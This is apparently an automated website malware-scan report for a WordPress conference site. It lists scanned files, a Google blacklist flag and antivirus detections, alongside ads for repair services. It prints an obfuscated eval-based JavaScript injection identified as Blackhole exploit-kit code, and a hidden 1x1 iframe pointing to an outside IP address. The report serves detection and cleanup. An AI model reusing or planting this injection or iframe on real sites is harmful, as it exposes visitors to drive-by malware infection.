New scan:

Malware Scanner report for mecap-conf.org

Malicious/Suspicious/Total urls checked
1/0/16
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "mecap-conf.org" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/1/1
1 suspicious iframe found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=mecap-conf.org

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://mecap-conf.org/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 22 Dec 2014 10:36:34 GMT
Location: http://www.mecap-conf.org/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.mecap-conf.org/xmlrpc.php
clean
http://www.mecap-conf.org/
200 OK
Content-Length: 20304
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

try{window.document.body/=2}catch(dgsgsdg){whwej=12;ww=window;}if(whwej){try{f=document.createElement("div");}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){v=window;n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1f","4j","d","9","9","9","41","3o","4a","3j","45","3n","4a","1e","1f","27"
... 2443 bytes are skipped ...
,"3p","40","4c","1d","1i","1d","1n","1m","1m","1d","1f","27","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3o","1f","27","d","9","9","4l"];h=2;s="";if(whwej){for(i=0;i-630!=0;i++){k=i;s+=String["fro"+"mC"+"harCode"](parseInt(n[i],12*2+1+1));}z=s;ww["eval"](s);}}}}

Antivirus reports:

AntiVir
JS/Blacole.LV
Avast
JS:Iframe-ALK [Trj]
Ikarus
Exploit.JS.Blacole
nProtect
Dropped:Trojan.JS.Agent.IWH
TrendMicro-HouseCall
TROJ_GEN.F47V0306
Comodo
TrojWare.JS.BlacoleRef.Z
McAfee-GW-Edition
Heuristic.LooksLike.HTML.Infected.B
DrWeb
Exploit.BlackHole.12
TrendMicro
HEUR_HTJS.HDJSFN
Microsoft
Exploit:JS/Blacole.LV
MicroWorld-eScan
Dropped:Trojan.JS.Agent.IWH
Fortinet
JS/Blacole.HT!exploit
McAfee
JS/Exploit-Blacole.gc
NANO-Antivirus
Trojan.Script.Iframe.bgvzbb
F-Secure
Dropped:Trojan.JS.Agent.IWH
AVG
HTML/Framer
Norman
Blacole.RU
GData
Dropped:Trojan.JS.Agent.IWH
Commtouch
Trojan.TAWG-8
BitDefender
Dropped:Trojan.JS.Agent.IWH

Hidden iFrame found.
size: 1x1     
src: http://176.31.24.102/post.php?id=2022585496

<iframe name=twitter scrolling=auto frameborder=no align=center height=1 width=1 src=http://176.31.24.102/post.php?id=2022585496>

http://www.mecap-conf.org//ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js?ver=1.7.1/
404 Not Found
Content-Length: 2445
Content-Type: text/html
clean
http://cdn.dsultra.com/js/registrar.js
200 OK
Content-Length: 1688
Content-Type: application/x-javascript
clean
http://www.mecap-conf.org/test404page.js
404 Not Found
Content-Length: 2445
Content-Type: text/html
clean
http://mecap-conf.org//ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/scriptaculous.js?ver=1.9.0/
404 Not Found
Content-Length: 2445
Content-Type: text/html
clean
http://mecap-conf.org//ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/effects.js?ver=1.9.0/
404 Not Found
Content-Length: 2445
Content-Type: text/html
clean
http://mecap-conf.org//ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/builder.js?ver=1.9.0/
404 Not Found
Content-Length: 2445
Content-Type: text/html
clean
http://www.mecap-conf.org/wp-content/plugins/kpicasa-gallery/lightbox2/js/lightbox.js?ver=2.04
200 OK
Content-Length: 18389
Content-Type: text/javascript
clean
http://www.mecap-conf.org/wp-includes/js/comment-reply.min.js?ver=3.8.1
200 OK
Content-Length: 757
Content-Type: text/javascript
clean
http://www.mecap-conf.org/wp-includes/js/jquery/jquery.js?ver=1.10.2
200 OK
Content-Length: 93085
Content-Type: text/javascript
clean
http://www.mecap-conf.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 7200
Content-Type: text/javascript
clean
http://www.mecap-conf.org/wp-content/themes/lightword/js/cufon-yui.js
200 OK
Content-Length: 18263
Content-Type: text/javascript
clean
http://www.mecap-conf.org/wp-content/themes/lightword/js/vera.font.js
200 OK
Content-Length: 33361
Content-Type: text/javascript
clean
http://www.mecap-conf.org/wp-content/themes/lightword/js/menu.js
200 OK
Content-Length: 509
Content-Type: text/javascript
clean
http://www.mecap-conf.org/wp-content/themes/lightword/js/tabs.js
200 OK
Content-Length: 937
Content-Type: text/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: mecap-conf.org

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 22 Dec 2014 10:36:34 GMT
Location: http://www.mecap-conf.org/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.mecap-conf.org/xmlrpc.php

...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mecap-conf.org
Referer: http://www.google.com/search?q=mecap-conf.org

Result:
The result is similar to the first query. There are no suspicious redirects found.